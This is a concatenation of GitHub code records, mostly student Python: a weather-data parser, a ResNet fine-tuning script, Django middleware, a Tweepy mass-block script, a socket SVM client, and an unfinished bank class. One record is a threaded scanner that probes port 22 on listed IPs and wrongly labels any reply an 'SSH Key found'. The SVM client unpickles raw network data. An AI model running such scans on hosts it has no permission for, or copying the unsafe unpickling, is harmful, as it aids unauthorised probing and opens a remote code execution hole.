count2\n","repo_name":"Nataly-Aketch/alx-higher_level_programming","sub_path":"0x05-python-exceptions/0-safe_print_list.py","file_name":"0-safe_print_list.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32835613674","text":"#Michael Johnston\n#Surface Data Analysis\n\nexecfile('/home/xb899100/bin/projectFun.py')\n\nsfcData = {'DIR' : [],\n 'U' : [],\n 'temperature' : [],\n 'dew' : []}\ndateTimes = []\nwith open('/home/xb899100/data/Station/SurfaceData.txt') as txtFile:\n next(txtFile)\n next(txtFile)\n for line in txtFile:\n myLine = line.split()\n DIR = int(myLine[5].split(',')[1])\n U = float(myLine[6].split(',')[0])\n temp = myLine[7].split(',')[0]\n dew = myLine[8].split(',')[0]\n \n date = myLine[4].split(',')[3]\n hour = myLine[4].split(',')[4][0:2]\n minute = myLine[4].split(',')[4][2:5]\n \n if hour in ['08', '09', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23']:\n if minute == '00':\n time = hour + ':' + minute\n if U < 50 and DIR < 361 and len(temp) > 0 and len(dew) > 0 and temp < '999.0' and dew < '999.0':\n sfcData['DIR'].append(DIR)\n sfcData['U'].append(U)\n sfcData['temperature'].append(float(temp))\n sfcData['dew'].append(float(dew))\n dateTimes.append(date + ' ' + time)\n elif minute == '55':\n hour = str(int(hour) + 1)\n if len(hour) < 2:\n hour = '0'+hour\n time = 
hour + ':' + '00'\n if U < 50 and DIR < 361 and len(temp) > 0 and len(dew) > 0 and temp < '999.0' and dew < '999.0':\n sfcData['DIR'].append(DIR)\n sfcData['U'].append(U)\n sfcData['temperature'].append(float(temp))\n sfcData['dew'].append(float(dew))\n dateTimes.append(date + ' ' + time)\n\nmyBins1 = intoBins(np.array(sfcData['DIR']), myres)\nmyBins = []\nfor mydate in visdates:\n #puts the date of the satellite image into the format of the surface data\n date = str(mydate.date()).split('-')\n date = date[0] + date[1] + date[2]\n #round the time of the satellite image to the nearest hour\n time = str(mydate.time()).split(':')\n if time[1] == '15':\n time = time[0] + ':00'\n else:\n hour = int(time[0]) + 1\n if len(str(hour)) < 2:\n hour = '0' + str(hour)\n time = str(hour) + ':00'\n mydateTime = date + ' ' + time\n if mydateTime in dateTimes:\n myBins.append(myBins1[dateTimes.index(mydateTime)])\n else:\n myBins.append(0.0)","repo_name":"mikejwx/main-bin","sub_path":"surfaceParseVis.py","file_name":"surfaceParseVis.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"11412168529","text":"# 微调\nimport os\nimport torch\nimport torchvision\nfrom torchvision import transforms\nfrom torch.utils import data\nfrom torch import nn\nfrom d2l import torch as d2l\nfrom func import show_images\nfrom matplotlib import pyplot as plt\n\n# 数据增强\n# 使用RGB通道的均值和标准差,以标准化每个通道\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])\ntrain_augs = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize])\ntest_augs = transforms.Compose([\n torchvision.transforms.Resize(256),\n transforms.RandomResizedCrop(224),\n transforms.ToTensor(),\n normalize])\n\n# 热狗数据集 http://d2l-data.s3-accelerate.amazonaws.com/hotdog.zip\ntrain_imgs = torchvision.datasets.ImageFolder(os.path.join('./data/hotdog', 'train'),transform=train_augs)\ntest_imgs = torchvision.datasets.ImageFolder(os.path.join('./data/hotdog', 'test'),transform=test_augs)\nhotdogs = [train_imgs[i][0] for i in range(8)]\nnot_hotdogs = [train_imgs[-i - 1][0] for i in range(8)]\nshow_images(hotdogs + not_hotdogs, 2, 8, scale=1.4)\nplt.show()\n\ntrain_iter = data.DataLoader(train_imgs,batch_size=128,shuffle=True,num_workers=0)\ntest_iter = data.DataLoader(test_imgs,batch_size=128,shuffle=False,num_workers=0)\nprint(next(iter(train_iter))[0].shape)\n\n# 使用微调\nnet = torchvision.models.resnet18(pretrained=True)\nprint(net)\nprint(net.fc)\n\nnet.fc = nn.Linear(net.fc.in_features, 2)\nnn.init.xavier_uniform_(net.fc.weight)\n\n\nlr , num_epochs = 5e-4, 10\n\nloss = nn.CrossEntropyLoss()\nparams_1x = [param for name, param in net.named_parameters()\n if name not in [\"fc.weight\", \"fc.bias\"]]\ntrainer = torch.optim.SGD([{'params': params_1x},\n {'params': net.fc.parameters(), 'lr': lr * 10}],\n lr=lr, weight_decay=0.001)\n\nd2l.train_ch13(net, train_iter, test_iter, loss, trainer, num_epochs,[torch.device('cuda:0')])\n\n\n# 不使用微调\nnet = torchvision.models.resnet18()\nnet.fc = nn.Linear(net.fc.in_features, 2)\ntrainer = torch.optim.SGD(net.parameters(),lr = 0.05 , weight_decay = 0.001)\nd2l.train_ch13(net, train_iter, test_iter, loss, trainer, 
num_epochs,[torch.device('cuda:0')])\n\n\nplt.show()","repo_name":"prety-good/D2l-notes","sub_path":"fine-tuning.py","file_name":"fine-tuning.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"11067426262","text":"# https://practice.geeksforgeeks.org/problems/count-the-reversals0401/1\n\n# CodeHelp Stack\n\ndef countRev (s):\n # if odd sized string then impossible to make pairs\n if len(s) & 1: return -1\n \n ans = 0\n st = []\n for c in s:\n if c == '{':\n st.append(c)\n else:\n if st and st[-1] == '{':\n st.pop()\n else:\n st.append(c)\n \n # if stack is still not empty, let's count reversals\n while st:\n a = st.pop()\n b = st.pop()\n if a == b:\n ans += 1\n else:\n ans += 2\n\n return ans ","repo_name":"anshawasthi01/Supreme-DSA","sub_path":"11. Stack/5. Assignments/02. Count the or (Minimum Bracket) Reversals[GFG].py","file_name":"02. Count the or (Minimum Bracket) Reversals[GFG].py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"14259633177","text":"from django.conf import settings\nfrom django.http import HttpResponseRedirect\n\n\nclass LoginMiddleware(object):\n NEED_AUTHENTICATION_URL = [\n \"/\",\n \"/todo/\"\n ]\n\n URL_CONTAINS = [\n [\"/todo/\", \"/edit/\"],\n [\"/todo/\", \"/delete/\"],\n [\"/logout/\"]\n ]\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n if request.user.id is None and self.contains(request, self.URL_CONTAINS):\n return HttpResponseRedirect(\"/login/\")\n\n response = self.get_response(request)\n return response\n\n def contains(self, request, paths=None):\n if request.path == \"/\":\n return True\n\n if paths is not None and type(paths) is list:\n for path in paths:\n if type(path) is list:\n count = 0\n for item in path:\n if item in request.path:\n count += 1\n\n if count == len(path):\n return True\n else:\n if path in request.path:\n return True\n\n return False\n\n\nclass HttpRedirect(object):\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n request.back = request.META.get(\"HTTP_REFERER\")\n\n response = self.get_response(request)\n return response\n","repo_name":"Naveigell/django-login-register-and-todo-app","sub_path":"main/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31574240504","text":"import tweepy\nimport json\n\nwith open(\"C:\\\\Users\\\\valen\\\\Desktop\\\\twitter_app\\\\twitter_keys.txt\", \"r\") as file:\n data = json.load(file)\n api_key = f\"{data['api_key']}\"\n api_secret = f\"{data['api_secret']}\"\n access_token = f\"{data['access_token']}\"\n access_token_secret = f\"{data['access_token_secret']}\"\n bearer_token = f\"{data['bearer_token']}\"\n client_id = f\"{data['client_id']}\"\n client_secret = f\"{data['client_secret']}\"\n\n# Auth\nauth = tweepy.OAuthHandler(api_key, api_secret)\nauth.set_access_token(access_token, access_token_secret)\napi =tweepy.API(auth,wait_on_rate_limit=True)\nclient = tweepy.Client(bearer_token)\n\ntweet_id = \"\"\ntweet = api.get_status(tweet_id)\n\napi.create_block(screen_name=tweet._json[\"user\"][\"screen_name\"]) #block who tweeted\nusers = client.get_liking_users(tweet_id)\n\nlikes_count = 
int(tweet._json[\"favorite_count\"])\nprint(\"Likes count: \", likes_count, \"\\n\")\n\nverified_accounts = []\nfollowing_accounts = []\nn=0\nwhile(True):\n if users.meta[\"result_count\"] == 0:\n break\n for x in users.data:\n user = api.get_user(screen_name=x)\n \n if user._json[\"verified\"] != True and user._json[\"following\"] != True:\n api.create_block(screen_name=x.username)\n print(x.username, \"blocked\")\n n=n+1\n else: \n if user._json[\"verified\"] == True:\n verified_accounts.append(x.username)\n \n if user._json[\"following\"] == True:\n following_accounts.append(x.username)\n \n print(\"\\nUsers remain:\", likes_count-n, \"\\n\")\n users = client.get_liking_users(tweet_id, pagination_token=users.meta[\"next_token\"])\n\nprint(\"\\n\",n, \" users blocked\\n\", sep=\"\")\n\nprint(\"Verified accounts not blocked:\\n\", verified_accounts)\nprint(\"Following accounts not blocked:\\n\", following_accounts)\n","repo_name":"Ngiok/twitter_app","sub_path":"block_tweet_liking_users.py","file_name":"block_tweet_liking_users.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"2471727568","text":"my_str=\"hello how are you\"\n# total number of characters in a string\nprint(len(my_str))\n# accessing last elemenent \nprint(my_str[len(my_str) - 1]) \n# negative indexing \nprint(my_str[-1]) ; # last character \nprint(my_str[-5]) ; # 5th last character \n# string slicing \n# start and end+1\nprint(my_str[2:7]) ;\n#print whole string\nprint(my_str[:])\n# only the last two characters are left \nprint(my_str[:-2]) ;\n#lowercase \nprint(my_str.lower()) \n#uppercase\nprint(my_str.upper()) \n# Capital first character of each word \nprint(my_str.title()) \n# return the index of the first occurrence of the word \nprint(my_str.find(\"how\"))\nprint(my_str.find(\"hoo\"))\n# splits the string with space \" \" and creates a list \nlist=my_str.split(\" \")\nprint(list)\n# repeat a number n no of times\nprint(\"hello \"*5)\n\n# lists in python\nmy_list=[5,6,7,8,9]\n# add element at the end of list\nmy_list.append(33)\n# inserts 88 at index i at which index you want to insert \nmy_list.insert(1,88) \n# delete the last element \n# pop function can also take an index if you want to delete at an specefic index \nmy_list.pop()\n# reverse a list \nmy_list.reverse()\n# sorts in ascending order \nmy_list.sort()\n# descending order \nmy_list.sort(reverse=True)\n# in operator \n8 in my_list\n\n# list comprehension\nnew_list=[] \nfor ele in my_list: \n new_list.append(ele**2) \n\nnew_list2=[ele**2 for ele in my_list] \n\n# tuples are similar to a list but you cannot change elements inside a tuple\ntup=(8,9,'Hello',88) \n\n# set contains only unique elements\nmy_set={9,7,7,1,8,9,7,5,1}\n# no duplicate elements \nprint(my_set)\n# add elements\nmy_set.add(99)\n# remove element \nmy_set.remove(8)\n\nsome_list=[6,3,3,8,3,4,5,9]\nmy_new_set=set(some_list)\n# some_list=list(my_new_set)\n\n# dictionaries\nuser_info={\n \"name\":\"Shobhit\",\n \"age\":21,\n \"nationality\":\"Indian\"\n}\n\n# to get value of key\nuser_info.get(\"hobby\")\n# display all keys in dictionary\nuser_info.keys()\n# display all values in dictionary \nuser_info.values() \n# display {key,value} pair in tuples \nuser_info.items() \n# iterate over a list \nfor(k,v) in user_info.items(): \n print(k,\" : \",v)\n# delete key \nuser_info.pop('nationality')\n\n\nlst1 = [2, 3, 4, 5]\nlst2 = [1, 2, 3, 4, 5]\n\nresult = lst1 + 
lst2\nprint(result)\n\nnewList=[i**2 if i%2==0 else i**3 for i in range(0,len(lst1))]\n\na = [1, 5, 3, 2, 4, 3, 2]\nb = [5, 3, 4, 2, 1]\n\nprint(set(a) == set(b))\n","repo_name":"kumarshobhit/Python-master-course","sub_path":"DataScience/ds.py","file_name":"ds.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"38725037916","text":"import PIL.Image\nimport os.path\n# Open the files in the same directory as the Python script\ndirectory = os.getcwd() \n#make a mask in the shape of a recycle sign\ndef recycle_mask(original_image):\n    width,height = original_image.size\n    recycle_file = os.path.join(directory, 'Recycle Sign.png')\n    recycle_img = PIL.Image.open(recycle_file)\n    recycle_size = recycle_img.resize((width, height))\n    result = PIL.Image.new('RGBA', original_image.size, (35,255,35,100))\n    result.paste(original_image, (8,10), mask=recycle_size) \n    return result\n\n#Get images in the current working directory\ndef get_images(directory=None):\n    \"\"\" Returns PIL.Image objects for all the images in directory.\n    \n    If directory is not specified, uses current directory.\n    Returns a 2-tuple containing \n    a list with a PIL.Image object for each image file in directory, and\n    a list with a string filename for each image file in directory\n    \"\"\"\n    \n    if directory == None:\n        directory = os.getcwd() # Use working directory if unspecified\n    \n    image_list = [] # Initialize aggregators\n    file_list = []\n    \n    directory_list = os.listdir(directory) # Get list of files\n    for entry in directory_list:\n        absolute_filename = os.path.join(directory, entry)\n        try:\n            image = PIL.Image.open(absolute_filename)\n            file_list += [entry]\n            image_list += [image]\n        except IOError:\n            pass # do nothing with errors trying to open non-images\n    return image_list, file_list\n#Make a new directory for the modified images\ndef recycle_mask_to_all_images(directory=None):\n    \"\"\" Saves a modified version of each image in directory.\n    \n    Uses current directory if no directory is specified. 
\n    Places images in subdirectory 'modified_earth', creating it if it does not exist.\n    New image files are of type PNG and have the green recycle-sign mask applied.\n    \"\"\"\n    \n    if directory == None:\n        directory = os.getcwd() # Use working directory if unspecified\n        \n    # Create a new directory 'modified_earth'\n    new_directory = os.path.join(directory, 'modified_earth')\n    try:\n        os.mkdir(new_directory)\n    except OSError:\n        pass # if the directory already exists, proceed \n    \n    #load all the images\n    image_list, file_list = get_images(directory)  \n\n    #go through the images and save modified versions\n    for n in range(len(image_list)):\n        # Parse the filename\n        filename, filetype = os.path.splitext(file_list[n])\n        \n        # Apply the recycle-sign mask\n        new_image = recycle_mask(image_list[n])\n        #save the altered image, using PNG to retain transparency\n        new_image_filename = os.path.join(new_directory, filename + '.png')\n        new_image.save(new_image_filename) ","repo_name":"andfritson/1.4.7","sub_path":"AFritson_1_4_7.py","file_name":"AFritson_1_4_7.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"12167456028","text":"import socket\nimport threading\nimport sys\n\ndef ssh_scan(ip, port):\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.settimeout(5)\n    try:\n        sock.connect((ip, port))\n        sock.send(b'\\x00\\x00\\x00\\x07ssh-keyscan')\n        data = sock.recv(1024)\n        if data:\n            print(f\"[+] {ip}:{port} - SSH Key found: {data}\")\n        else:\n            print(f\"[-] {ip}:{port} - No SSH Key found\")\n    except:\n        print(f\"[-] {ip}:{port} - Connection refused\")\n    finally:\n        sock.close()\n\ndef main():\n    if len(sys.argv) < 2:\n        print(\"[-] Please provide a file with IPs\")\n        sys.exit()\n\n    filename = sys.argv[1]\n    with open(filename, 'r') as f:\n        ip_list = f.readlines()\n\n    for ip in ip_list:\n        t = threading.Thread(target=ssh_scan, args=(ip.strip(), 22))\n        t.start()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"codex15/cdx","sub_path":"PrivateSSHKeyScanner.py","file_name":"PrivateSSHKeyScanner.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17138853159","text":"#! 
/usr/bin/env python\nimport os, random, sys, math\n\nimport pygame\nfrom pygame.locals import *\n\nfrom configuracion import *\nfrom extras import *\nfrom funcionesSeparador import *\nfrom funcionesVACIAS import *\nfrom menu import*\nfrom principal import*\n\ndef lectura2(archivo, lista):\n nueva=archivo.readlines()\n palabra=\"\"\n for i in range(len(nueva)):\n for letra in (nueva[i]):\n if (letra>=\"a\" and letra<=\"z\" or letra==\"ñ\") or (letra>=\"0\" and letra <=\"9\"):\n palabra=palabra+letra\n else:\n lista.append(palabra)\n palabra=\"\"\n\ndef esta(jugador,nombres):\n False\n for elemento in nombres:\n if elemento==jugador:\n return True\n\ndef puntaje(nombres,mejores,jugador,puntos):\n auxMej=[]\n auxNom=[]\n\n i=0\n while i < (len(nombres)):\n if int(puntos)>= int(mejores[i]) and not(esta(jugador,auxNom)):\n auxMej.append(puntos)\n auxNom.append(jugador)\n auxMej.append(mejores[i])\n auxNom.append(nombres[i])\n else:\n auxMej.append(mejores[i])\n auxNom.append(nombres[i])\n i=i+1\n\n for i in range(len(auxMej)-1):\n nombres[i]=auxNom[i]\n mejores[i]=auxMej[i]\n\n\ndef menu2(puntos):\n res = (720,720)\n\n screen = pygame.display.set_mode(res)\n\n color = (255,255,255)\n\n color_light = (170,170,170)\n\n color_dark = (100,100,100)\n\n defaultFont= pygame.font.Font( pygame.font.get_default_font(), TAMANNO_LETRA)\n #Abrir lista de nombres y puntos\n LiNombres=[]\n LiMejores=[]\n #Tomar las lista de los archivos\n nombres=open(\"nombres.txt\",\"r\")\n lectura2(nombres,LiNombres)\n nombres.close()\n mejores=open(\"mejores.txt\",\"r\")\n lectura2(mejores,LiMejores)\n mejores.close()\n\n #Nombre que no esté en la lista de nombres\n jugador=(input(\"Ingrese su nombre Máximo de 6 letras\"))\n while esta(jugador,LiNombres) and len(jugador)<=6:\n jugador=input(\"Ingrese otro nombre\")\n\n\n puntaje(LiNombres,LiMejores,jugador,puntos)\n\n titulo=defaultFont.render(\"Lograste \" + str(puntos) + \" puntos\" , True , COLOR_LETRAS)\n top5=defaultFont.render(\"TOP 5\" , True , COLOR_LETRAS)\n nombre0 = defaultFont.render(LiNombres[0] , True , COLOR_LETRAS)\n puntos0 =defaultFont.render(str(LiMejores[0]) , True , COLOR_LETRAS)\n nombre1 = defaultFont.render(LiNombres[1] , True , COLOR_LETRAS)\n puntos1 =defaultFont.render(str(LiMejores[1]) , True , COLOR_LETRAS)\n nombre2 = defaultFont.render(LiNombres[2] , True , COLOR_LETRAS)\n puntos2 =defaultFont.render(str(LiMejores[2]) , True , COLOR_LETRAS)\n nombre3 = defaultFont.render(LiNombres[3] , True , COLOR_LETRAS)\n puntos3 =defaultFont.render(str(LiMejores[3]) , True , COLOR_LETRAS)\n nombre4 = defaultFont.render(LiNombres[4] , True , COLOR_LETRAS)\n puntos4 =defaultFont.render(str(LiMejores[4]) , True , COLOR_LETRAS)\n puesto1=defaultFont.render(\"1.\" , True , COLOR_LETRAS)\n puesto2=defaultFont.render(\"2.\" , True , COLOR_LETRAS)\n puesto3=defaultFont.render(\"3.\" , True , COLOR_LETRAS)\n puesto4=defaultFont.render(\"4.\" , True , COLOR_LETRAS)\n puesto5=defaultFont.render(\"5.\" , True , COLOR_LETRAS)\n text=defaultFont.render(\"Reintentar\" , True , COLOR_LETRAS)\n text2=defaultFont.render(\"Salir\" , True , COLOR_LETRAS)\n\n #Reescribir los archivos de nombres y puntos\n nombres=open(\"nombres.txt\",\"w\")\n for elemento in LiNombres:\n nombres.write(elemento+\"\\n\")\n nombres.close()\n mejores=open(\"mejores.txt\",\"w\")\n for elemento in LiMejores:\n mejores.write(str(elemento)+\"\\n\")\n mejores.close()\n\n while True:\n\n for ev in pygame.event.get():\n\n if ev.type == pygame.QUIT:\n if ev.type == pygame.QUIT:\n pygame.quit()\n if 
ev.type==KEYDOWN:\n if ev.key==K_ESCAPE:\n pygame.quit()\n quit()\n #Acción del click en botones\n if ev.type == pygame.MOUSEBUTTONDOWN:\n if 100 <= mouse[0] <= 240 and 500 <= mouse[1] <= 540:\n main()\n if 560 <= mouse[0] <= 700 and 500 <= mouse[1] <= 540:\n pygame.quit()\n\n\n screen.fill((0, 22, 142))\n\n\n\n mouse = pygame.mouse.get_pos()\n #Forma y color de botones cuando pasan por encima con el mouse.\n if 100 <= mouse[0] <= 240 and 500 <= mouse[1] <= 540:\n pygame.draw.rect(screen,color_light,[100,500,140,40])\n else:\n pygame.draw.rect(screen,color_dark,[100,500,140,40])\n\n if 560 <= mouse[0] <= 700 and 500 <= mouse[1] <= 540:\n pygame.draw.rect(screen,color_light,[560,500,140,40])\n else:\n pygame.draw.rect(screen,color_dark,[560,500,140,40])\n\n #Dibujar título\n screen.blit(titulo ,(260,100))\n screen.blit(top5 ,(315,200))\n #Dibujar puestos\n screen.blit(puesto1 ,(275,250))\n screen.blit(nombre0 ,(305,250))\n screen.blit(puntos0 ,(385,250))\n screen.blit(puesto2 ,(275,300))\n screen.blit(nombre1 ,(305,300))\n screen.blit(puntos1 ,(385,300))\n screen.blit(puesto3 ,(275,350))\n screen.blit(nombre2 ,(305,350))\n screen.blit(puntos2 ,(385,350))\n screen.blit(puesto4 ,(275,400))\n screen.blit(nombre3 ,(305,400))\n screen.blit(puntos3 ,(385,400))\n screen.blit(puesto5 ,(275,450))\n screen.blit(nombre4 ,(305,450))\n screen.blit(puntos4 ,(385,450))\n #Texto de botones\n screen.blit(text ,(120,510))\n screen.blit(text2 ,(580,510))\n\n\n\n\n pygame.display.update()","repo_name":"FacundoVaz/Cv_Facundo.Vazquez.juego.Python","sub_path":"Menu2.py","file_name":"Menu2.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"29937593277","text":"#!/usr/bin/env python3\n# OACI airport list\nairports = ['LECH', 'LERI', 'LEPP', 'LEMH', 'LELL', 'LEIB',\n 'LEPA_LESJ', 'LELC', 'LEGE', 'LEAL', 'LESB', 'LEPO',\n 'LERS', 'LXGB', 'LEAM', 'LEZG', 'LEMD', 'LEBB', 'LEXJ', 'LEBA',\n 'LEVX', 'LEZL', 'LEBG', 'LESA', 'LETO', 'LELN', 'LEAS', 'LEVD',\n 'LEGT', 'LERJ', 'LESO', 'LEVT', 'LECO', 'LEST', 'LEMO', 'LEGA',\n 'LEDA', 'LESU', 'LEJR', 'LEMI', 'LETL', 'GCLP', 'GCLA', 'GCXO',\n 'GCRR', 'GSVO', 'GSAI', 'GCTS', 'GCFV', 'GCHI', 'GEML', 'LEMG',\n 'LEGR', 'LEHC', 'LEBZ', 'LEBL', 'LEAB', 'LECU_LEVS', 'GCGM', 'LEVC',\n 'LERT', 'LERL', 'LEAG', 'LEAO', 'GEHM', 'GECE', 'LECV', 'LEEC',\n 'LETA', 'LELO', 'GCXM', 'LEBT']\n","repo_name":"chiflmas/aero_charts","sub_path":"airports.py","file_name":"airports.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"gn","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"26629662679","text":"Sample_dict = {\n \"beam_on\" : 1,\n \"beam_off\" : 2,\n \"nu\" : 3,\n \"nue\" : 4,\n \"dirt\" : 5,\n \"filter_cc_cpi\" : 61,\n \"filter_cc_pi0\" : 62,\n \"filter_cc_nopi\" : 63,\n \"filter_nc_cpi\" : 71,\n \"filter_nc_pi0\" : 72,\n \"filter_nc_nopi\" : 73,\n \"train_elee\" : 81,\n \"train_nu\" : 82,\n \"train_nue\" : 83,\n \"train_pi0\" : 84,\n \"train_nc_pi0\" : 85,\n \"train_cc_pi0\" : 86, #not used yet\n \"train_nopi_tight\" : 87,\n \"beam_sideband\" : 9,\n \"fake\" : 1,\n \"DetVar\" : 10\n } \n \n","repo_name":"Wouter-VDP/nuecc_python","sub_path":"helpers/gpvm/enum_sample.py","file_name":"enum_sample.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"5197633753","text":"import socket\nimport numpy as np\nimport pickle\nimport time\n#import 
keras\n#from keras.datasets import mnist\nimport sys\nfrom sklearn import linear_model\nfrom sklearn.externals import joblib\n\n#(x_train, y_train), (x_test, y_test) = mnist.load_data()\n# create socket object\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclf = linear_model.SGDClassifier()\nhost = 'localhost'\nport = 25000\n\n# connect to localhost\ns.connect((host, port))\nfeatures = []\nclassifications = []\n#feature = []\n#classification = []\nreceived_count = 0;\n\n############\n# Load SVM #\n############\nclf = joblib.load('mnist_svm.pkl')\nnum_samples = 0;\nnum_correct = 0;\nstartTime = time.time()\nwhile 1:\n#\tprint(classification)\n # start processing packets\n\tfeature = []\n\tendOfPacket = False\n\tbad_feature = False\n\tbad_class = False\n\twhile 1:\n\t\tbad_packet = False\n\t\tpacket_msg = s.recv(1400)\n\t\tif(not packet_msg): break\n\t\ttry:\n\t\t\tpacket = pickle.loads(packet_msg)\n\t\texcept:\n\t\t\tbad_packet = True\n\t\t\tbad_feature = True\n\t\t\tbad_class = True\n\t\t\tprint('bad packet help me!')\n\t\t\thelp_msg = pickle.dumps('bp')\n\t\t\tprint('size of outgoing', sys.getsizeof(help_msg))\n\t\t\ts.sendall(help_msg)\n\t\t\tbreak\n\t\tif(not bad_packet):\n\t\t\tif(packet == 'eoa'):\n\t\t\t\tendOfPacket = True\n\t\t\t\ts.send(pickle.dumps('gf'))\n\t\t\t\tbreak\n\t\t\tfeature.extend(packet)\n\t\t\ts.send(pickle.dumps('gp'))\n\t\n #bad_feature = False\n\t\n\t#feature_msg = s.recv(400000)\n\t#if( not feature_msg): break\n\t#try:\n #\t\tfeature = pickle.loads(feature_msg)\n\t#except:\n\t#\tbad_feature = True;\n\t#\tprint('unexpected error: ', sys.exc_info()[0])\n\t\t# send message to server saying bad feature received\n\t\t# server will try to resend\n #\ts.send(pickle.dumps('bf'))\n #if(not bad_feature):\n\t\t# send message to server saying good featrue received\n\t\t#s.send(pickle.dumps('gf'))\n\tif(not bad_packet):\n\t\tclass_msg = s.recv(1400)\n\t\tif(not class_msg): break\n\t\ttry:\n\t\t\tprint('trying classification!')\n\t\t\tclassification = pickle.loads(class_msg)\n\t\texcept:\n\t\t\tprint('bad class!!!')\n\t\t\tbad_class = True;\n\t\t\tclassification = []\n\t\t\t# send message to server saying bad classification received\n\t\t\t# server will try to resend\t\t\t\n\t\t\ts.send(pickle.dumps('bc'))\n\t\tif(not bad_class):\n\t\t\tif(type(classification) == type([])):\n\t\t\t\tclassification = []\n\t\t\t\ts.send(pickle.dumps('bc'))\n\t\t\telse:\n\t\t\t\tpredicted_class = clf.predict(np.array([feature]))\n\t\t\t\tnum_samples = num_samples+1\n\t\t\t\tprint('predicted: ', predicted_class)\n\t\t\t\tprint('actual: ', classification)\n\t\t\t\tif((predicted_class[0] - classification) < 0.1):\n\t\t\t\t\tnum_correct = num_correct+1\n\t\t\t\tscore = float(float(num_correct)/float(num_samples))\n\t\t\t\tprint('score: ', score)\n\t\t\t\ts.send(pickle.dumps('gc'))\n\nendTime = time.time()\nrunTime = endTime - startTime\nprint('Classification of', num_samples,'took', runTime,'seconds and achieved an accuracy of', score)\n#joblib.dump(clf, 'mnist_svm.pkl')\ns.close()\n","repo_name":"patmclaughlin94/DistributedCNN_SVM","sub_path":"mnist_svm_boosted_packet.py","file_name":"mnist_svm_boosted_packet.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"33075284598","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n    path('create/', views.movie_create, name='movie_create'),\n    path('index/', views.movie_list, name='movie_list'),\n    path('<int:movie_pk>/', views.movie_detail, name='movie_detail'),\n    # path('<int:movie_pk>/recommend/', views.hero_movie_list, name='hero_movie_list'),\n    path('<int:movie_pk>/reviews/', views.review_list, name='review_list'),\n    path('<int:movie_pk>/reviews2/', views.review_list_login, name='review_list_login'),\n    path('<int:movie_pk>/review/create/', views.review_create, name='review_create'),\n    path('review/<int:review_pk>/', views.review_update_delete, name='review_update_delete'),\n    path('rlr/', views.recommend_list_rate, name='recommend_list_rate'),\n    path('<int:movie_pk>/my_review/', views.my_movie_review, name='my_movie_review')\n]\n","repo_name":"5angjae/MCUR","sub_path":"final-pjt-back-master/movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"18065203023","text":"# in the_bank.py\n\nclass Account(object):\n    ID_COUNT = 1\n\n    def __init__(self, name, **kwargs):\n        self.id = self.ID_COUNT\n        self.name = name\n        self.__dict__.update(kwargs)\n        # if hasattr(self, 'value'):\n        #     self.value = 0\n        Account.ID_COUNT += 1\n\n    def transfer(self, amount):\n        self.value += amount\n\n    def is_corrupted(self):\n        ok = True\n        attributes = list(self.__dict__.keys())\n        if \"value\" not in attributes:\n            return True\n        if len(attributes) % 2 == 0:\n            return True\n        for attr in attributes:\n            if attr[0] == \"b\":\n                return True\n            if attr.startswith(\"zip\") or attr.startswith(\"addr\"):\n                ok = False\n        return ok\n\n\n# in the_bank.py\n\nclass Bank(object):\n    \"\"\"The bank\"\"\"\n\n    def __init__(self):\n        self.account = []\n        self.has_b_prefix = False\n\n    def add(self, account):\n        self.account.append(account)\n\n    def get_account(self, p):\n        if isinstance(p, int):\n            for account in self.account:\n                if account.id == p:\n                    return account\n        if isinstance(p, str):\n            for account in self.account:\n                if account.name == p:\n                    return account\n\n    def transfer(self, origin, dest, amount: float) -> bool:\n        \"\"\"\n        @origin: int(id) or str(name) of the first account\n        @dest: int(id) or str(name) of the destination account\n        @amount: float(amount) amount to transfer\n        @return True if success, False if an error occurred\n        \"\"\"\n        origin_account = self.get_account(origin)\n        dest_account = self.get_account(dest)\n        if not isinstance(origin_account, Account) or not isinstance(dest_account, Account):\n            return False\n        elif not origin_account.is_corrupted() and not dest_account.is_corrupted():\n            value = origin_account.value\n            if value >= amount and value > 0:\n          